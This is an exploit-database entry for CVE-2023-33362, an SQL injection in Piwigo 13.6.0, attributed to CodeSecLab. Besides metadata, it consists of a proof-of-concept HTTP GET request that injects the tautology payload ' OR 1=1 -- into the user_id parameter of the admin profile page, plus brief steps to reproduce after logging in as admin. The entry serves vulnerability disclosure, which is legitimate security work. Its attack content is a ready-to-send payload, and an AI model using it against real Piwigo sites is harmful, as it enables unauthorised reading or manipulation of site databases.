Piwigo 13.6.0 - SQL Injection

Author: CodeSecLab
type: webapps
platform: php
port: 
date_added: 2025-12-02
date_updated: 2025-12-02
verified: 0
codes: CVE-2023-33362
tags: 
aliases: 
screenshot_url: 
application_url: 

# Exploit Title: Piwigo 13.6.0 - SQL Injection
# Date: 2025-11-25
# Exploit Author: CodeSecLab
# Vendor Homepage:  https://github.com/Piwigo/Piwigo
# Software Link: https://github.com/Piwigo/Piwigo
# Version: 13.6.0
# Tested on: Windows
# CVE : CVE-2023-33362


Proof Of Concept:
GET /admin.php?page=profile&user_id=' OR 1=1 --  HTTP/1.1
Host: piwigo

Steps to Reproduce
Login as an admin user.
Send the request.
Observe the result